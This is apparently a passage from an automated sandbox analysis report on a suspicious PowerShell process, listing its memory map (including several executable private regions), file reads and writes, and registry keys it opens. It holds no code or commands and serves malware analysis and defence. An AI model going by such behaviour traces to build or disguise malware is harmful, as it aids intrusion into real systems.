| cversions.2.db | 0x00370000 | 0x00373fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x00380000 | 0x0039ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x004f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x010fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001100000 | 0x01100000 | 0x011defff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011e0000 | 0x011e0000 | 0x011e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000011f0000 | 0x011f0000 | 0x0122ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001230000 | 0x01230000 | 0x0126ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x01270000 | 0x01273fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001280000 | 0x01280000 | 0x01280fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001290000 | 0x01290000 | 0x0129ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x012a0000 | 0x0156efff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x01570000 | 0x0159ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x015a0000 | 0x01605fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001610000 | 0x01610000 | 0x01610fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001620000 | 0x01620000 | 0x01620fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001630000 | 0x01630000 | 0x0163ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001640000 | 0x01640000 | 0x0164ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001650000 | 0x01650000 | 0x0165ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001660000 | 0x01660000 | 0x0169ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000016a0000 | 0x016a0000 | 0x01a92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001aa0000 | 0x01aa0000 | 0x01b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01beffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01bfffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01c0ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01cfffff | Private Memory | rwx |
|
|
|
- |
| l_intl.nls | 0x01d00000 | 0x01d02fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01d10fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01d20000 | 0x01d24fff | Memory Mapped File | r |
|
|
|
- |
| sortkey.nlp | 0x01d30000 | 0x01d70fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01dc0000 | 0x01dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x01dd0000 | 0x01e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001e20000 | 0x01e20000 | 0x01e20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e70000 | 0x01e70000 | 0x01e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e7ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01e90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01eaffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01ebffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ed0000 | 0x01ed0000 | 0x03ecffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x03ed0000 | 0x03f23fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003f30000 | 0x03f30000 | 0x03f3ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000003f40000 | 0x03f40000 | 0x03f4ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000003f50000 | 0x03f50000 | 0x03f5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000003f60000 | 0x03f60000 | 0x03f6ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000003f80000 | 0x03f80000 | 0x03fbffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x03fc0000 | 0x042a1fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x042b0000 | 0x0436ffff | Memory Mapped File | rw |
|
|
|
- |
| powershell.exe | 0x22150000 | 0x221c1fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x60100000 | 0x60104fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x60110000 | 0x60223fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x60230000 | 0x60333fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x603b0000 | 0x608e5fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x609a0000 | 0x609ccfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x609d0000 | 0x60a92fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x60aa0000 | 0x60c3dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x60c40000 | 0x60cdbfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x60cf0000 | 0x60d74fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x60d80000 | 0x60da4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x60db0000 | 0x60dfafff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x60e00000 | 0x61034fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x612d0000 | 0x61b49fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x61bf0000 | 0x61ed1fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x61ee0000 | 0x61f60fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x61f70000 | 0x6270bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x628c0000 | 0x633b7fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x633c0000 | 0x6396afff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x65420000 | 0x654bafff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x654c0000 | 0x65539fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x66bc0000 | 0x66c09fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x70870000 | 0x70878fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x70880000 | 0x708adfff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x70d20000 | 0x70d8ffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x70d90000 | 0x70d9afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x72130000 | 0x7217bfff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x73d50000 | 0x73d59fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75040000 | 0x75056fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x75830000 | 0x75848fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77980000 | 0x77984fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 62 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (317)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
10 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
4 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
6 | |
| Get Info | C:\Users | type = file_attributes |
|
2 | |
| Read | - | size = 4096, size_out = 4096 |
|
47 | |
| Read | - | size = 4096, size_out = 436 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
2 | |
| Read | - | size = 4096, size_out = 2530 |
|
1 | |
| Read | - | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
83 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | - | size = 16060 |
|
1 | |
| Write | - | size = 4096 |
|
15 | |
| Write | - | size = 13424 |
|
1 | |
| Write | - | size = 5840 |
|
5 | |
| Write | - | size = 20440 |
|
2 | |
| Write | - | size = 26280 |
|
1 | |
| Write | - | size = 35040 |
|
1 | |
| Write | - | size = 37960 |
|
1 | |
| Write | - | size = 8760 |
|
2 | |
| Write | - | size = 9328 |
|
1 | |
| Write | - | size = 18088 |
|
1 | |
| Write | - | size = 14600 |
|
2 | |
| Write | - | size = 13140 |
|
1 | |
| Write | - | size = 27132 |
|
1 | |
| Write | - | size = 18980 |
|
1 | |
| Write | - | size = 22468 |
|
1 | |
| Write | - | size = 43800 |
|
1 | |
| Write | - | size = 64024 |
|
1 | |
| Write | - | size = 24820 |
|
1 | |
| Write | - | size = 65536 |
|
7 | |
| Write | - | size = 24984 |
|
1 | |
| Write | - | size = 17520 |
|
1 | |
| Write | - | size = 29648 |
|
1 | |
| Write | - | size = 8924 |
|
1 | |
| Write | - | size = 19548 |
|
1 | |
| Write | - | size = 19144 |
|
1 | |
| Write | - | size = 11680 |
|
1 | |
| Write | - | size = 33744 |
|
1 | |
| Write | - | size = 63064 |
|
1 | |
| Write | - | size = 13304 |
|
1 | |
| Write | - | size = 17968 |
|
1 | |
| Write | - | size = 62148 |
|
1 | |
| Write | - | size = 1536 |
|
1 |
Registry (128)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
2 | |
| Open Key | System | - |
|
1 | |
| Open Key | System\PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
